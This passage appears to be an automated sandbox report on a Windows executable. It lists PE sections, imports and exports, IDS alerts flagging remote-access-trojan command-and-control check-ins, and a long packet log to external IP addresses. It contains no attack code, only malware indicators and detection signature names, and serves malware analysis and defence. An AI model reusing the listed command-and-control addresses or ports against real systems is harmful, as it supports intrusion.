                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x26f0000x9ee.didata
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x2581fc0x258200fa5e754e5d1c4f8bc93987d1c306d14eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .itext0x25a0000x26c80x2800367bc90dd8be7c6a1056ad2a82281084False0.503125data6.119631643767066IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .data0x25d0000x5a640x5c00c20c3606951695cd5626a53022531398False0.40281080163043476data5.055173307610014IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .bss0x2630000x780c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .idata0x26b0000x35d80x36006cbfeeac8d17ca3b356e9c16e6f19fc1False0.33622685185185186data5.280395234482991IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .didata0x26f0000x9ee0xa002726dff14c86e88d2aaa4303cf2dc681False0.36328125data4.360393246158077IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .edata0x2700000x970x2008c377a4128fcc7899b263e28899a337bFalse0.251953125data1.7456444612923019IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .tls0x2710000x440x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rdata0x2720000x5d0x2002f7aa57241cc0d4266afaa9ceb64679aFalse0.189453125data1.3590642120925076IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0x2730000xec550xee0009a0444489bc5d14abd83f9355f8763aFalse0.2914915966386555data5.138022968656879IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_BITMAP0x2733340xd28Device independent bitmap graphic, 48 x 48 x 8, image size 0, resolution 3780 x 3780 px/m, 256 important colors0.16508313539192399
                                                                                  RT_BITMAP0x27405c0x32aDevice independent bitmap graphic, 16 x 16 x 24, image size 770, resolution 3779 x 3779 px/m0.2074074074074074
                                                                                  RT_ICON0x2743880x2488PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9942258340461934
                                                                                  RT_ICON0x2768100x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.11478507321681625
                                                                                  RT_ICON0x27aa380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.15383817427385893
                                                                                  RT_ICON0x27cfe00x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 6720EnglishUnited States0.18284023668639054
                                                                                  RT_ICON0x27ea480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.24108818011257035
                                                                                  RT_ICON0x27faf00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.32581967213114754
                                                                                  RT_ICON0x2804780x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 1680EnglishUnited States0.37209302325581395
                                                                                  RT_ICON0x280b300x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.4512411347517731
                                                                                  RT_GROUP_ICON0x280f980x76dataEnglishUnited States0.7288135593220338
                                                                                  RT_VERSION0x2810100x514dataEnglishUnited States0.3046153846153846
                                                                                  RT_MANIFEST0x2815240x731XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.40195545898967955

                                                                                  Imports

                                                                                  DLLImport
                                                                                  mpr.dllWNetEnumResourceW, WNetGetUniversalNameW, WNetGetConnectionW, WNetCloseEnum, WNetOpenEnumW
                                                                                  comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                  comctl32.dllFlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, FlatSB_GetScrollInfo, ImageList_Write, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_Draw, ImageList_Remove
                                                                                  shell32.dllSHBrowseForFolderW, ExtractIconW, SHGetMalloc, SHGetFileInfoW, SHChangeNotify, Shell_NotifyIconW, ShellExecuteW, SHGetPathFromIDListW, ShellExecuteExW
                                                                                  user32.dllCopyImage, CreateWindowExW, GetMenuItemInfoW, SetMenuItemInfoW, DefFrameProcW, GetDCEx, GetMessageW, PeekMessageW, MonitorFromWindow, GetDlgCtrlID, ScrollWindowEx, SetTimer, WindowFromPoint, BeginPaint, RegisterClipboardFormatW, FrameRect, MapVirtualKeyW, OffsetRect, IsWindowUnicode, RegisterWindowMessageW, FillRect, GetMenuStringW, DispatchMessageW, SendMessageA, DefMDIChildProcW, EnumWindows, GetClassInfoW, GetSystemMenu, WaitForInputIdle, ShowOwnedPopups, GetScrollRange, GetScrollPos, SetScrollPos, GetActiveWindow, SetActiveWindow, DrawEdge, InflateRect, GetKeyboardLayoutList, OemToCharBuffA, LoadBitmapW, DrawFocusRect, EnumChildWindows, GetScrollBarInfo, SendNotifyMessageW, ReleaseCapture, UnhookWindowsHookEx, LoadCursorW, GetCapture, SetCapture, CreatePopupMenu, ScrollWindow, ShowCaret, GetMenuItemID, GetLastActivePopup, CharLowerBuffW, GetSystemMetrics, SetWindowLongW, PostMessageW, DrawMenuBar, SetParent, IsZoomed, CharUpperBuffW, GetClientRect, IsChild, ClientToScreen, SetWindowPlacement, IsIconic, CallNextHookEx, GetMonitorInfoW, ShowWindow, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, SetForegroundWindow, GetWindowTextW, EnableWindow, DestroyWindow, IsDialogMessageW, EndMenu, RegisterClassW, CharNextW, GetWindowThreadProcessId, RedrawWindow, GetDC, GetFocus, SetFocus, EndPaint, ExitWindowsEx, ReleaseDC, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, GetClassLongW, ActivateKeyboardLayout, GetParent, CharToOemBuffA, DrawTextW, SetScrollRange, InsertMenuItemW, PeekMessageA, GetPropW, SetClassLongW, MessageBoxW, MessageBeep, SetPropW, SetRectEmpty, UpdateWindow, RemovePropW, GetSubMenu, MsgWaitForMultipleObjects, DestroyMenu, DestroyIcon, SetWindowsHookExW, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, AdjustWindowRectEx, DrawIcon, IsWindow, EnumThreadWindows, InvalidateRect, GetKeyboardState, DrawFrameControl, ScreenToClient, SendMessageTimeoutW, BringWindowToTop, SetCursor, CreateIcon, CreateMenu, LoadStringW, CharLowerW, SetWindowPos, SetWindowRgn, GetMenuItemCount, RemoveMenu, AppendMenuW, GetSysColorBrush, GetKeyboardLayoutNameW, GetWindowDC, TranslateMessage, DrawTextExW, MapWindowPoints, EnumDisplayMonitors, CallWindowProcW, DestroyCursor, ReplyMessage, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, EnableScrollBar, GetSysColor, TrackPopupMenu, DrawIconEx, PostQuitMessage, GetClassNameW, ShowScrollBar, EnableMenuItem, GetIconInfo, GetMessagePos, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, GetCursorPos, SetCursorPos, HideCaret, GetMenu, GetMenuState, SetMenu, SetRect, GetKeyState, FindWindowExW, MonitorFromPoint, SystemParametersInfoW, LoadIconW, GetCursor, GetWindow, GetWindowLongW, GetWindowRect, InsertMenuW, KillTimer, WaitMessage, IsWindowEnabled, IsDialogMessageA, TranslateMDISysAccel, GetWindowPlacement, FindWindowW, DeleteMenu, GetKeyboardLayout
                                                                                  version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                                                                                  oleaut32.dllSafeArrayPutElement, LoadTypeLib, GetErrorInfo, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, SafeArrayCreate, SafeArrayGetElement, GetActiveObject, SysAllocStringLen, SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, RegisterTypeLib, VariantChangeType, VariantCopyInd
                                                                                  advapi32.dllRegSetValueExW, RegEnumKeyExW, AdjustTokenPrivileges, OpenThreadToken, GetUserNameW, RegDeleteKeyW, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegQueryInfoKeyW, AllocateAndInitializeSid, FreeSid, EqualSid, RegDeleteValueW, RegFlushKey, RegQueryValueExW, RegEnumValueW, GetTokenInformation, InitializeSecurityDescriptor, RegCloseKey, RegCreateKeyExW, SetSecurityDescriptorDacl
                                                                                  netapi32.dllNetWkstaGetInfo, NetApiBufferFree
                                                                                  kernel32.dllSetFileAttributesW, SetFileTime, GetACP, GetExitCodeProcess, IsBadWritePtr, CloseHandle, LocalFree, GetCurrentProcessId, SizeofResource, VirtualProtect, QueryPerformanceFrequency, FindNextFileW, GetFullPathNameW, VirtualFree, ExitProcess, HeapAlloc, WriteProfileStringW, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, FileTimeToLocalFileTime, GetModuleHandleW, FreeLibrary, HeapDestroy, CompareFileTime, ReadFile, CreateProcessW, TransactNamedPipe, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, OpenMutexW, CreateThread, CompareStringW, CopyFileW, CreateMutexW, LoadLibraryA, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, MoveFileW, GlobalAddAtomW, GetSystemTimeAsFileTime, FormatMessageW, OpenProcess, SwitchToThread, GetExitCodeThread, GetCurrentThread, GetLogicalDrives, LocalFileTimeToFileTime, SetNamedPipeHandleState, LoadLibraryExW, TerminateProcess, LockResource, FileTimeToSystemTime, GetShortPathNameW, GetCurrentThreadId, UnhandledExceptionFilter, MoveFileExW, VirtualQuery, GlobalFindAtomW, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, ReleaseMutex, FlushFileBuffers, LoadResource, SuspendThread, GetTickCount, WritePrivateProfileStringW, GetFileSize, GetStartupInfoW, GlobalDeleteAtom, GetFileAttributesW, GetCurrentDirectoryW, SetCurrentDirectoryW, InitializeCriticalSection, GetThreadPriority, GetCurrentProcess, SetThreadPriority, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, DeviceIoControl, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, lstrcmpW, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateNamedPipeW, ExitThread, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, GetComputerNameW, IsValidLocale, TlsSetValue, CreateDirectoryW, GetOverlappedResult, GetSystemDefaultUILanguage, EnumCalendarInfoW, GetProfileStringW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, IsDBCSLeadByte, CreateEventW, GetPrivateProfileStringW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
                                                                                  ole32.dllStgCreateDocfileOnILockBytes, CoCreateInstance, CLSIDFromString, CoUninitialize, IsEqualGUID, OleInitialize, CoFreeUnusedLibraries, CreateILockBytesOnHGlobal, CLSIDFromProgID, OleUninitialize, CoDisconnectObject, CoInitialize, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID
                                                                                  gdi32.dllArc, Pie, SetBkMode, SelectPalette, CreateCompatibleBitmap, ExcludeClipRect, RectVisible, SetWindowOrgEx, MaskBlt, AngleArc, Chord, SetTextColor, StretchBlt, SetDIBits, SetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetDIBColorTable, RoundRect, RestoreDC, SetRectRgn, GetTextMetricsW, RemoveFontResourceW, GetWindowOrgEx, CreatePalette, CreateBrushIndirect, PatBlt, LineDDA, PolyBezierTo, GetStockObject, CreateSolidBrush, Polygon, Rectangle, MoveToEx, DeleteDC, SaveDC, BitBlt, Ellipse, FrameRgn, GetDeviceCaps, GetBitmapBits, GetTextExtentPoint32W, GetClipBox, Polyline, IntersectClipRect, GetSystemPaletteEntries, CreateBitmap, AddFontResourceW, CreateDIBitmap, GetStretchBltMode, CreateDIBSection, CreatePenIndirect, SetStretchBltMode, GetDIBits, CreateFontIndirectW, PolyBezier, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, DeleteObject, SelectObject, ExtFloodFill, UnrealizeObject, SetBkColor, CreateCompatibleDC, GetObjectW, GetBrushOrgEx, GetCurrentPositionEx, SetROP2, GetTextExtentPointW, ExtTextOutW, SetBrushOrgEx, GetPixel, ArcTo, GdiFlush, SetPixel, EnumFontFamiliesExW, GetPaletteEntries

                                                                                  Exports

                                                                                  NameOrdinalAddress
                                                                                  TMethodImplementationIntercept30x4aefc0
                                                                                  __dbk_fcall_wrapper20x40eb68
                                                                                  dbkFCallWrapperAddr10x66663c

                                                                                  Possible Origin

                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishUnited States

                                                                                  Network Behavior

                                                                                  Suricata IDS Alerts

                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2025-01-08T07:15:05.390726+01002001046ET MALWARE UPX compressed file download possible malware347.79.48.230443192.168.2.449732TCP
                                                                                  2025-01-08T07:15:33.044544+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.449740154.82.85.10715091TCP
                                                                                  2025-01-08T07:16:43.500651+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.449741154.82.85.10715091TCP
                                                                                  2025-01-08T07:17:55.290074+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.450009154.82.85.10715091TCP

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jan 8, 2025 07:14:56.797892094 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:56.803703070 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:56.803776979 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:57.619026899 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.619049072 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.619062901 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.619076014 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.619087934 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.619098902 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.619102955 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:57.619112015 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.619126081 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.619127035 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:57.619137049 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.619153023 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.619179010 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:57.619193077 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:57.623941898 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.624001980 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.624016047 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.624042988 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.624047041 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:57.624100924 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:57.846117973 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.846142054 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.846153975 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.846168041 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.846187115 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.846199989 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.846332073 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.846399069 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:57.846399069 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:57.846695900 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.846718073 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.846749067 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:57.846812963 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.846826077 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.846873999 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:57.846927881 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.846940994 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.847004890 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:57.847527027 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.847548008 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.847560883 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.847601891 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:57.847601891 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:57.847759008 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.847771883 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.847783089 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.847836971 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:57.848464966 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.848506927 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:57.848522902 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.848536015 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.848552942 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.848563910 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:57.848586082 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:57.848618984 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.072171926 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.072190046 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.072213888 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.072226048 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.072237968 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.072340965 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.072350025 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.072350025 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.072402954 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.072424889 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.072437048 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.072484970 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.072503090 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.072741032 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.072760105 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.072771072 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.072796106 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.072813988 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.072837114 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.073141098 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.073160887 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.073232889 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.073250055 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.073261976 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.073302031 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.073422909 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.073434114 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.073445082 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.073456049 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.073494911 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.073494911 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.074091911 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.074151039 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.074157953 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.074162960 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.074233055 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.074264050 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.074276924 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.074287891 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.074373007 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.074400902 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.074413061 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.074460030 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.075026989 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.075047970 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.075057983 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.075109959 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.075109959 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.075164080 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.075254917 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.075265884 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.075274944 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.075285912 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.075330973 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.075341940 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.075978994 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.075990915 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.076035976 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.298491955 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.298517942 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.298531055 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.298578024 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.298592091 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.298603058 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.298610926 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.298616886 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.298639059 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.298666000 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.298715115 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.298763037 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.298789978 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.298810959 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.298899889 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.298912048 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.298957109 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.298975945 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.299210072 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.299221039 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.299232960 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.299267054 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.299299002 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.299316883 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.299329996 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.299343109 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.299375057 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.299375057 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.299794912 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.299807072 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.299817085 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.299854994 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.299854994 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.299947023 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.299958944 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.299969912 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.299983978 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:14:58.300010920 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.300026894 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.301326036 CET497308853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:14:58.306143999 CET885349730154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:03.039799929 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:03.044747114 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:03.044816017 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:03.342003107 CET49732443192.168.2.447.79.48.230
